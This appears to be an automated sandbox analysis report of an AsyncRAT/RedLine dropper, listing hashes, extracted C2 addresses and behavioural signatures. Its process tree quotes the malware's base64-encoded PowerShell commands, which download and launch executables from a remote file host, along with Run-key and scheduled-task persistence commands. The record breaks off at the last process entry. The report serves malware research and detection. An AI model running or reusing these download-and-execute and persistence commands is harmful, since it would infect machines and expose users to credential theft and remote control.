Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-02-2023 01:18

General

  • Target

    76a794c86b0f80ae8ec3461e05e0fb0fb219e57f7e85ebdae3cc10901a99791c.exe

  • Size

    622KB

  • MD5

    4a35d67996cdcde8da42ba8e40015738

  • SHA1

    21342be12a055a2c1caffd73cc7866c81cb3e585

  • SHA256

    76a794c86b0f80ae8ec3461e05e0fb0fb219e57f7e85ebdae3cc10901a99791c

  • SHA512

    96f3904de25540397b1a499828f1781c943ffba4d42e2028b6ab322dbb3916bc03adf5ca084bf2afa3a90272a9c986e7d11b23e26ab86856225b0d0aef9f8ad2

  • SSDEEP

    12288:U/C3Xp1sthiBKo+NJv9B3K6EwC2EQcmowOmA9BRMsrLS3t5r0I1Uu:e+Xp14hiBr+NJDvEwFQBPMqLS3kIC

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

WindowsDefenderSmarttScreen

C2

217.64.31.3:9742

Mutex

WindowsDefenderSmarttScreen

Attributes
  • delay

    1

  • install

    false

  • install_file

    WindowsDefenderSmarttScreen.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

LWRTX

C2

20.199.101.68:3161

Mutex

LWRTX

Attributes
  • delay

    3

  • install

    false

  • install_file

    LWRTX

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Async RAT payload 3 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 27 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\76a794c86b0f80ae8ec3461e05e0fb0fb219e57f7e85ebdae3cc10901a99791c.exe
    "C:\Users\Admin\AppData\Local\Temp\76a794c86b0f80ae8ec3461e05e0fb0fb219e57f7e85ebdae3cc10901a99791c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Users\Admin\AppData\Roaming\DSFHJ7.EXE
        "C:\Users\Admin\AppData\Roaming\DSFHJ7.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\system32\cmd.exe
          "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2496
          • C:\Users\Admin\AppData\Local\Temp\0.exe
            C:\Users\Admin\AppData\Local\Temp\0.exe
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4280
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAagBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAxADgAMAA4ADkAMQAyADUAOQAwADUAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGwAZgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegBxAGoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB2AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAaABrAG0ALgBlAHgAZQAnACkAKQA8ACMAbgBmAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBwAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAbQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGgAawBtAC4AZQB4AGUAJwApADwAIwByAGoAcwAjAD4A"
              6⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3904
              • C:\Users\Admin\AppData\Roaming\hkm.exe
                "C:\Users\Admin\AppData\Roaming\hkm.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2716
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                  8⤵
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:960
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                  8⤵
                    PID:976
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      9⤵
                      • Creates scheduled task(s)
                      PID:1152
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    #cmd
                    8⤵
                      PID:3728
            • C:\Windows\system32\cmd.exe
              "cmd" /C C:\Users\Admin\AppData\Local\Temp\1.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3800
              • C:\Users\Admin\AppData\Local\Temp\1.exe
                C:\Users\Admin\AppData\Local\Temp\1.exe
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2640
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAxADkANAAyADkANgAyADUAMAA0ADMAOAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBmAHoAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBxAGcAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgAuAGUAeABlACcAKQApADwAIwBwAGMAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGUAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQB5AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIALgBlAHgAZQAnACkAPAAjAHYAcwBxACMAPgA="
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4652
                  • C:\Users\Admin\AppData\Roaming\bbb.exe
                    "C:\Users\Admin\AppData\Roaming\bbb.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3848
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      8⤵
                        PID:2568
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\2.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4064
                • C:\Users\Admin\AppData\Local\Temp\2.exe
                  C:\Users\Admin\AppData\Local\Temp\2.exe
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3136
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAxADkANgA2ADMANgA2ADgAOAA1ADYANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAHIAbgBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABsAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBjAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIAMgAuAGUAeABlACcAKQApADwAIwBqAGwAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHoAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgBkAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIAMgAuAGUAeABlACcAKQA8ACMAZwByAGgAIwA+AA=="
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5012
                    • C:\Users\Admin\AppData\Roaming\bbb2.exe
                      "C:\Users\Admin\AppData\Roaming\bbb2.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2736
                      • C:\Users\Admin\AppData\Roaming\bbb2.exe
                        "C:\Users\Admin\AppData\Roaming\bbb2.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:1876
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\3.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3808
                • C:\Users\Admin\AppData\Local\Temp\3.exe
                  C:\Users\Admin\AppData\Local\Temp\3.exe
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3288
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAeQBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAyADIAMAA0ADMANQAxADYAOQAzADEAMAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AagBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBqAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABpAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIAMwAuAGUAeABlACcAKQApADwAIwBxAGwAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBiAHkAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIAMwAuAGUAeABlACcAKQA8ACMAZABlAHUAIwA+AA=="
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4132
                    • C:\Users\Admin\AppData\Roaming\bbb3.exe
                      "C:\Users\Admin\AppData\Roaming\bbb3.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1640
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\4.exe
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3148
                • C:\Users\Admin\AppData\Local\Temp\4.exe
                  C:\Users\Admin\AppData\Local\Temp\4.exe
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2088
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAyADQAOQA5ADAAMAAxADMANAA0ADAAMAAvAFcATABXAFIAVABYAC4AZQB4AGUAJwAsACAAPAAjAGcAcwBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwB4AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBsAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIANAAuAGUAeABlACcAKQApADwAIwB5AGoAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGkAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABmAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYgBiAGIANAAuAGUAeABlACcAKQA8ACMAcQBkAGoAIwA+AA=="
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:432
                    • C:\Users\Admin\AppData\Roaming\bbb4.exe
                      "C:\Users\Admin\AppData\Roaming\bbb4.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1872
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WLWRTX';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WLWRTX' -Value '"C:\Users\Admin\AppData\Roaming\WLWRTX\WLWRTX.exe"' -PropertyType 'String'
                        8⤵
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2208
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd" /C schtasks /create /tn \WLWRTX /tr "C:\Users\Admin\AppData\Roaming\WLWRTX\WLWRTX.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                        8⤵
                          PID:336
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /create /tn \WLWRTX /tr "C:\Users\Admin\AppData\Roaming\WLWRTX\WLWRTX.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                            9⤵
                            • Creates scheduled task(s)
                            PID:3200
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          #cmd
                          8⤵
                            PID:2252
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\5.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1028
                    • C:\Users\Admin\AppData\Local\Temp\5.exe
                      C:\Users\Admin\AppData\Local\Temp\5.exe
                      5⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:1172
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAegB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAyADcAMwAxADQAMAA3ADkAMwAzADYANAAvAFcAcwBhAHQALgBlAHgAZQAnACwAIAA8ACMAZQBpAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHIAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAHoAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA1AC4AZQB4AGUAJwApACkAPAAjAHgAYQByACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAeABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AHAAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA1AC4AZQB4AGUAJwApADwAIwBuAG4AbgAjAD4A"
                        6⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2776
                        • C:\Users\Admin\AppData\Roaming\bbb5.exe
                          "C:\Users\Admin\AppData\Roaming\bbb5.exe"
                          7⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:396
                          • C:\Users\Admin\AppData\Roaming\bbb5.exe
                            "C:\Users\Admin\AppData\Roaming\bbb5.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:1192
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\6.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1212
                    • C:\Users\Admin\AppData\Local\Temp\6.exe
                      C:\Users\Admin\AppData\Local\Temp\6.exe
                      5⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3092
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBqACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAyADcAOQAxADkANwAzADYANAAzADEANQAvAHAAYwBjAGkAbABlAG0AcABsAG0ALgBlAHgAZQAnACwAIAA8ACMAcQBhAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHYAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGcAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA2AC4AZQB4AGUAJwApACkAPAAjAHUAYgB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGQAaABuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAHMAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA2AC4AZQB4AGUAJwApADwAIwBqAHIAaAAjAD4A"
                        6⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2708
                        • C:\Users\Admin\AppData\Roaming\bbb6.exe
                          "C:\Users\Admin\AppData\Roaming\bbb6.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4816
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            8⤵
                              PID:1076
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\7.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3548
                      • C:\Users\Admin\AppData\Local\Temp\7.exe
                        C:\Users\Admin\AppData\Local\Temp\7.exe
                        5⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3328
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANwA4ADAANAAwADYAMgAzADQAOAA5ADIAMgA0ADcAOQA0AC8AMQAwADcAOAAwADQAMQAyADkAMQAyADAAMQA0ADUAMAAwADgANAAvAFcARABSAEsALgBlAHgAZQAnACwAIAA8ACMAcAB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGkAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA3AC4AZQB4AGUAJwApACkAPAAjAHcAbABxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGIAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHgAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBiAGIAYgA3AC4AZQB4AGUAJwApADwAIwBzAG0AeAAjAD4A"
                          6⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2980
                          • C:\Users\Admin\AppData\Roaming\bbb7.exe
                            "C:\Users\Admin\AppData\Roaming\bbb7.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:1448
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\8.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4876
                      • C:\Users\Admin\AppData\Local\Temp\8.exe
                        C:\Users\Admin\AppData\Local\Temp\8.exe
                        5⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        PID:3440
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
